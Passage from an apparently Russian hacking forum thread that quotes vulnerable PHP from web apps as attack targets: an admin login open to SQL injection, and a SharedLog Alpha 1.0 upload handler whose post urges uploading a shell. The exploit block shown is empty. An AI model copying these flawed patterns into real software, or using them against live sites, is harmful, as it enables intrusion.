if([/COLOR][COLOR="#0000BB"]$AName[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]$APwd[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"�û������벻Ϊ��"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"select * from Admin where AName='[/COLOR][COLOR="#0000BB"]$AName[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]))
{
if([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'APwd'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$APwd[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'AID'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'AID'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'AName'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'AName'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Power'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'Power'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CPower'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'CPower'[/COLOR][COLOR="#007700"]];
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
}
return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]delete[/COLOR][COLOR="#007700"]()
{
global[/COLOR][COLOR="#0000BB"]$conn[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"delete * from Admin where AID=[/COLOR][COLOR="#007700"]{[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]AID[/COLOR][COLOR="#007700"]}[/COLOR][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$children[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]children[/COLOR][COLOR="#007700"]();
if([/COLOR][COLOR="#0000BB"]$children[/COLOR][COLOR="#007700"])
{
foreach([/COLOR][COLOR="#0000BB"]$children[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$child[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]$child[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]delete[/COLOR][COLOR="#007700"]();
}
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
}
[/COLOR][COLOR="#FF8000"]/*
CREATE TABLE `Admin` (
`AID` int(10) unsigned NOT NULL auto_increment,
`AName` varchar(255) NOT NULL,
`APwd` varchar(255) NOT NULL,
`PID` int(10) unsigned NOT NULL,
`AddDate` int(11) NOT NULL default '0',
`Power` int(11) NOT NULL default '0',
`CPower` text NOT NULL,
PRIMARY KEY (`AID`),
UNIQUE KEY `AName` (`AName`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1
*/
[/COLOR][COLOR="#0000BB"]?>[/COLOR][/COLOR]
Ну и собственно сплоит "на скорую руку":
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
|
|
|
|
03.08.2011, 20:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
4100
Репутация:
74
|
|
SharedLog Alpha 1.0
В топку скули и ИКСы, сразу заливаемся!
slideshow_uploadaudio.content.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]....
[/COLOR][COLOR="#0000BB"]sess[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] = @[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#DD0000"]'en'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#FF8000"]//
[/COLOR][COLOR="#0000BB"]$hdlTranslation[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] );
if ( isSet([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]]) ) {
[/COLOR][COLOR="#FF8000"]//
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]strToUpper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]])==[/COLOR][COLOR="#DD0000"]'POST'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"];
}else if ([/COLOR][COLOR="#0000BB"]strToUpper[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'REQUEST_METHOD'[/COLOR][COLOR="#007700"]])==[/COLOR][COLOR="#DD0000"]'GET'[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"];
}else {
[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"]= ( isSet([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"]: (isSet([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"]: array() ) ) ;
}
}
[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]= (isSet([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]) ;
[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]' '[/COLOR][COLOR="#007700"]&&isSet([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) ?[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]) ;
[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strToLower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]) ;
[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] = ( @[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'en'[/COLOR][COLOR="#007700"]) ;
[/COLOR][COLOR="#0000BB"]set_cookie_reffered[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'ev_ref_id'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ev_http'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ev_date'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// from lib.sys
// Prevent not logged in user from accessing the pages for only logged in users.
// now must use session to store userID and maybe sid also. Sid is tied to user password
// it's at least a substring of md5($password)
// it will be more secure to use both uid and sid, but not necessary.
[/COLOR][COLOR="#007700"]if ( empty([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'user_idnr'[/COLOR][COLOR="#007700"]]) )
{
if ( !isset([/COLOR][COLOR="#0000BB"]$NOT_LOGINED_USER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$a[/COLOR][COLOR="#007700"]]) )
{
[/COLOR][COLOR="#0000BB"]redirect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MAIN_FILE[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'?a=login¬-logined&from='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]urlEncode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"]]) );
}
}
else
{
[/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user'[/COLOR][COLOR="#007700"]];
}
if (!isset([/COLOR][COLOR="#0000BB"]$hdlGlobal[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$hdlGlobal[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]clsGlobal[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$objLogger[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$hdlCache[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$hdlTpl[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$hdlTranslation[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arrSettings[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$arrResourceType[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'DIR_AUDIO'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/monster/Content/resources/audiofiles/"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]#define('DIR_AUDIO', "/usr/local/apache/sites/dcomments.com/htdocs/video_streaming/prototype/resources/audiofiles/");//Temporary location
//this is used when audio file uploaded and inserted it will automatically get selected in dropdown
[/COLOR][COLOR="#0000BB"]$intAudioClipId[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]/*Language translation class for multilingual setup start*/
[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] = ( @[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#0000BB"]$H[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] :[/COLOR][COLOR="#DD0000"]'en'[/COLOR][COLOR="#007700"]) ;
[/COLOR][COLOR="#FF8000"]#--------------------------------------------------------------------------
# TRANSLATION
#--------------------------------------------------------------------------
[/COLOR][COLOR="#0000BB"]$GLOBALS[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'PARAMS'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'strings_tables'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$hdlCache[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnGetValues[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'arrLangs'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]//$TR2 =& Translation2::factory($GLOBALS['tr2_driver'], $GLOBALS['DBINFO'], $GLOBALS['PARAMS'] ) ;
[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] = @[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]?[/COLOR][COLOR="#DD0000"]'en'[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] ;
[/COLOR][COLOR="#0000BB"]$hdlTranslation[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]setLang[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SESSION[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'lang'[/COLOR][COLOR="#007700"]] );
[/COLOR][COLOR="#FF8000"]#--------------------------------------------------------------------------
/*Language translation class for multilingual setup end*/
[/COLOR][COLOR="#0000BB"]$arrLangVars[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlTranslation[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]getPage[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"create_slide_show"[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]intval[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'imageid'[/COLOR][COLOR="#007700"]])!=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$imageid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'imageid'[/COLOR][COLOR="#007700"]];
}
else
{
[/COLOR][COLOR="#0000BB"]$imageid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'tempimageid'[/COLOR][COLOR="#007700"]];
}
[/COLOR][COLOR="#FF8000"]/*Handling file upload start*/
[/COLOR][COLOR="#007700"]if(isset([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'btnupload'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlGlobal[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]arrUser[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'user_idnr'[/COLOR][COLOR="#007700"]];
if([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$flag[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// flag variable used to check if there was any error while image upload, Aysha 9 Apr 2007
[/COLOR][COLOR="#0000BB"]$strUploadPath[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]DIR_AUDIO[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]]);
[/COLOR][COLOR="#0000BB"]$hdlUploadFile[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]clsUploadAVFiles[/COLOR][COLOR="#007700"]();
if(![/COLOR][COLOR="#0000BB"]$hdlUploadFile[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnIsVirusInFile[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]]))
{
[/COLOR][COLOR="#0000BB"]$strResult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Error uploading File, File contains virus!"[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#0000BB"]$strResult[/COLOR][COLOR="#007700"];
}
[/COLOR][COLOR="#FF8000"]//echo $strDestinationLocation;
[/COLOR][COLOR="#007700"]if([/COLOR][COLOR="#0000BB"]move_uploaded_file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'tmp_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]$strUploadPath[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$strType[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'type'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$sqlResource[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO `RESOURCE` SET `userinfo_id`="[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" , `resource_type_id`=3 , `description`='Auto created by Uploader' , `added_time`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y-m-d H:i:s"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"', `upload_method_id`='www' , `img_type`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$strType[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"' , `orig_name`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' , `deleted`='0' , `featured`='N' , `nntp_messages_id`='0'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnInsertUpdate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlResource[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' in '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FUNCTION__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'(); 20050705_032027 '[/COLOR][COLOR="#007700"]) ;
[/COLOR][COLOR="#0000BB"]$intResourceId[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnLastInsertId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'RESOURCE'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$strDestinationLocation[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlUploadFile[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnPreparePath[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$intResourceId[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]DIR_AUDIO[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$strType[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"audio"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]//**********Prepare location for audio file
/*echo $strUploadPath."
";
echo DIR_AUDIO."/".$strDestinationLocation;*/
[/COLOR][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$strUploadPath[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]DIR_AUDIO[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$strDestinationLocation[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]//**************Update avatar field in db
[/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"INSERT INTO AUDIO_FILES VALUES('','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$userid[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_FILES[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'audiofile'[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'name'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"','','"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$intResourceId[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"',UNIX_TIMESTAMP( ),'N')"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnInsertUpdate[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sqlAudioFiles[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FILE__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]BR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' in '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]__FUNCTION__[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'(); 20050705_032027 '[/COLOR][COLOR="#007700"]) ;
[/COLOR][COLOR="#0000BB"]$intAudioClipId[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]fnLastInsertId[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'AUDIO_FILES'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]unlink[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$strUploadPath[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$strResult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"File uploaded successfully!"[/COLOR][COLOR="#007700"];
}
else
{
[/COLOR][COLOR="#0000BB"]$strResult[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"Image Uploading failed"[/COLOR][COLOR="#007700"];
}
}
}
[/COLOR][COLOR="#FF8000"]/*
function #-------------------{ fnGetPageSlideShows }-------------------()
{} */
# +-----------------------------------------------------------------------+
# | Description: Handling file upload end
# | Params: $intAudioClipId - Integer audio clip id
# +-----------------------------------------------------------------------+
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]fnGetHTMLSelectBoxAudioList[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'Select Audio'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#0000BB"]fnBuildAudioDropdownDynamicOptions[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"];
}
function[/COLOR][COLOR="#0000BB"]fnBuildAudioDropdownDynamicOptions[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$arrUser[/COLOR][COLOR="#007700"])
{
global[/COLOR][COLOR="#0000BB"]$hdlDb[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]/*Feching preloaded Audio files*/
// Temporary static files given
[/COLOR][COLOR="#0000BB"]$html[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'----Preloaded Audio Clips----'[/COLOR][COLOR="#007700"].
[/COLOR][COLOR="#DD0000"]'Audio file 1'[/COLOR][COLOR="#007700"].
